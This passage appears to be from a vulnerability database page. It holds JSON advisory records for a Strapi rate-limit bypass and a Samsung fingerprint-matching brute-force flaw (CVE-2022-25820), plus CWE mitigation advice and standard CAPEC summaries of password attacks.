      "url": "https://github.com/strapi/strapi"
    },
    {
      "type": "WEB",
      "url": "https://github.com/strapi/strapi/releases/tag/v5.45.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Strapi has a rate limit bypass on users-permissions plugin via attacker-controlled email keying"
}

GHSA-7Q24-F637-M9V4

Vulnerability from github – Published: 2022-03-11 00:02 – Updated: 2022-03-17 00:01
VLAI
Details

A vulnerable design in fingerprint matching algorithm prior to SMR Mar-2022 Release 1 allows physical attackers to perform brute force attack on screen lock password.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-25820"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-307"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-03-10T17:47:00Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerable design in fingerprint matching algorithm prior to SMR Mar-2022 Release 1 allows physical attackers to perform brute force attack on screen lock password.",
  "id": "GHSA-7q24-f637-m9v4",
  "modified": "2022-03-17T00:01:18Z",
  "published": "2022-03-11T00:02:05Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25820"
    },
    {
      "type": "WEB",
      "url": "https://security.samsungmobile.com/securityUpdate.smsb?year=2022\u0026month=3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design
  • Common protection mechanisms include:
  • Disconnecting the user after a small number of failed attempts
  • Implementing a timeout
  • Locking out a targeted account
  • Requiring a computational task on the user's part.
Mitigation MIT-4
Architecture and Design

Strategy: Libraries or Frameworks

  • Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482].
  • Consider using libraries with authentication capabilities such as OpenSSL or the ESAPI Authenticator. [REF-45]
CAPEC-16: Dictionary-based Password Attack

An attacker tries each of the words in a dictionary as passwords to gain access to the system via some user's account. If the password chosen by the user was a word within the dictionary, this attack will be successful (in the absence of other mitigations). This is a specific instance of the password brute forcing attack pattern.

Dictionary Attacks differ from similar attacks such as Password Spraying (CAPEC-565) and Credential Stuffing (CAPEC-600), since they leverage unknown username/password combinations and don't care about inducing account lockouts.

CAPEC-49: Password Brute Forcing

An adversary tries every possible value for a password until they succeed. A brute force attack, if feasible computationally, will always be successful because it will essentially go through all possible passwords given the alphabet used (lower case letters, upper case letters, numbers, symbols, etc.) and the maximum length of the password.

CAPEC-560: Use of Known Domain Credentials

An adversary guesses or obtains (i.e. steals or purchases) legitimate credentials (e.g. userID/password) to achieve authentication and to perform authorized actions under the guise of an authenticated user or service.

CAPEC-565: Password Spraying

In a Password Spraying attack, an adversary tries a small list (e.g. 3-5) of common or expected passwords, often matching the target's complexity policy, against a known list of user accounts to gain valid credentials. The adversary tries a particular password for each user account, before moving onto the next password in the list. This approach assists the adversary in remaining undetected by avoiding rapid or frequent account lockouts. The adversary may then reattempt the process with additional passwords, once enough time has passed to prevent inducing a lockout.

CAPEC-600: Credential Stuffing

An adversary tries known username/password combinations against different systems, applications, or services to gain additional authenticated access. Credential Stuffing attacks rely upon the fact that many users leverage the same username/password combination for multiple systems, applications, and services.

CAPEC-652: Use of Known Kerberos Credentials

An adversary obtains (i.e. steals or purchases) legitimate Kerberos credentials (e.g. Kerberos service account userID/password or Kerberos Tickets) with the goal of achieving authenticated access to additional systems, applications, or services within the domain.

CAPEC-653: Use of Known Operating System Credentials

An adversary guesses or obtains (i.e. steals or purchases) legitimate operating system credentials (e.g. userID/password) to achieve authentication and to perform authorized actions on the system, under the guise of an authenticated user or service. This applies to any Operating System.